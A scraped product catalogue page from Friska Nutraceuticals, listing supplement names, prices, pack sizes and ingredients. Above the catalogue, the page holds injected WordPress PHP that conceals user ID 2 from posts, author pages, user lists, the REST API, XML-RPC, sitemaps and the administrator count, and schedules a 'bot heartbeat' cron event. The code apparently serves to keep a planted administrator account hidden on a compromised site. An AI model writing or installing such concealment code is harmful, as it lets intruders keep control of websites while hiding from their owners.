add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 2;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 2 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 2 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 2;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 2;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 2;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/2(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 2;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
Nutraceuticals – Friska Nutraceuticals. Pvt. Ltd
CARLOM

MRP: ₹ 1050/-
Pack: 200 ml
Composition: L-Carnosine with DHA & Vitamin D Suspension
CARLOM TABLET

MRP: ₹ 820/-
Pack: 10 Tablets
Composition: L-Carnosine 400mg Tablets
FRICALM GUMMY

MRP: ₹ 540/-
Pack: 30 Gummy
Composition: Melatonin Gummy 5mg
FNVIT+ SYRUP

MRP: ₹ 175/-
Pack: 200 ml
Composition: Citrus Bioflavonoids Antioxidants with essential Vitamins & Minerals
TEKME FORTE SACHET

MRP: ₹ 200/-
Pack: 10gm SACHET
Composition: Granules of L-Arginine Safed Musli(Chlorophytum Borivilianum extract) & Pine Bark
FRIPROCT

MRP: ₹ 270/-
Pack: 30 Capsules
Composition: An Ayurvedic Medicine
TMX-P Mouth Gel

MRP: ₹ 199/-
Pack: 20 ml Gel
Composition: Turmeric, Tea Tree Oil, Cedarwood Oil, Aloe Gel
MEMORALL STRIP

MRP: ₹ 250/-
Pack: 10 Capsules
Composition: DMAE, Vinpocetine, Huperazine, Gincobo Biloba, Bacupa Morreni
PEGCARE Sachet

MRP: ₹ 30/-
Pack: 9.5 gm Sachet
Composition: Polyethylene Glycol with Electrolytes for oral solution
DESOMEGA-UD

MRP: ₹ 270/-
Pack: 10 Softgel Capsules
Composition: Docosahexaenoic Acid Softgel Capsules
DES OMEGA Capsules

MRP: ₹ 140/-
Pack: 10 Softgel Capsules
Composition: Omega-3 Fatty Acid, Vitamin A, Pantothenic Acid, Folic Acid, Vitamin B6, Grape & White Seed Extract, Zinc
FRISKA DES OMEGA

MRP: ₹ 2100/-
Pack: 60 Softgel Capsules
Composition: Fish Oil 100mg, EPA 480mg, DHA 360mg.
ZAPMAG

MRP: ₹ 450/-
Pack: 60 Chewable Tablets
Composition: Magnesium Bisglycinate Chelate 785mg
TEKME

MRP: ₹ 320/-
Pack: 10 Capsules
Composition: Fast-acting And Powerful Formulation of 7 Herbal Aphrodiasiacs
Fri John

MRP: ₹ 280/-
Pack: 10 Tablets
Composition: L-theanine, 5 HTP, Withania somnifera, Magnesium, St. John wort, Chamomile, Vitamin B6 Tablets
Feel Iron Tablets

MRP: ₹ 120/-
Pack: 10 Tablets
Composition: Ferrous Asparto Glycinate, Methylobalamin, L-Methylfolate, Pyridoxal-5-Phosphate & Vitamin D2 Tablets
BONSWISS Tablet

MRP: ₹ 169/-
Pack: 10 Tablets
Composition: Corel Calcium & Vitamin D3 Tablets
CBLU

MRP: ₹ 112.50/-
Pack: 15 Tablets
Composition: Vitamin C chewable Tablets
CQ-DAY

MRP: ₹ 385/-
Pack: 10 Tablets
Composition: Coenzyme Q-10 100mg, L-carnitine 500mg, L-Arginine 100mg
DES OMEGA

MRP: ₹ 190/-
Pack: 10 Softgel Capsules
Composition: Softgel of Omega 3 fatty acid
LAC-FRIS Sachets

MRP: ₹ 38/-
Pack: 1 gm
Composition: Saccharomyces Boulardii Sachets
LAC-FRIS Capsule

MRP: ₹ 149/-
Pack: 10 Capsules
Composition: Saccharomyces Boulardii Capsules
LAC-FRIS GOLD

MRP: ₹ 280/-
Pack: 10 Capsules
Composition: Pre & Probiotics with Lactitol Capsules
FRICOOL

MRP: ₹ 199/-
Pack: 60ML
Composition: Ayuervedic Pain Roll-on
MEMORALL

MRP: ₹ 749/-
Pack: 30 Capsules
Composition: DMAE, Vinpocetine, Huperazine, Gincobo Biloba, Bacupa Morreni
MYGRASET

MRP: ₹ 199/-
Pack: 10 Tablets
Composition: Riboflavin, whitewillow, Magnesium, Butterber, Feverfew, Green Tea
NUTZYME SYP

MRP: ₹ 99/-
Pack: 200ML
Composition: Fungal Diastase, pepsin with vitamin B complex syrup
PEGCARE

MRP: ₹ 299/-
Pack: 137.15 Grams
Composition: POLYETHYLENE GLYCOL
STON CLEAR

MRP: ₹ 135/-
Pack: 30 Capsules
Composition: Ayurvedic kidney stone capsules
CRAMPEZE

MRP: ₹ 200/-
Pack: 10 Tablets
Composition: Muscle cramp tablets
SWISSCOUNT

MRP: ₹ 270/-
Pack: 10 Capsules
Composition: Carica papaya extract 350mg + Tinospora cordifolia extract 150mg capsules
SWISSCOUNT PLUS

MRP: ₹ 540/-
Pack: 10 Capsules
Composition: Carica papaya extract 750mg, Tinospora Cordifolia Extract 250mg , Ocimum Santum Capsules
DES OMEGA SYRUP

MRP: ₹ 1150/-
Pack: 200ML
Composition: DHA, EPA SYRUP
Start typing to see products you are looking for.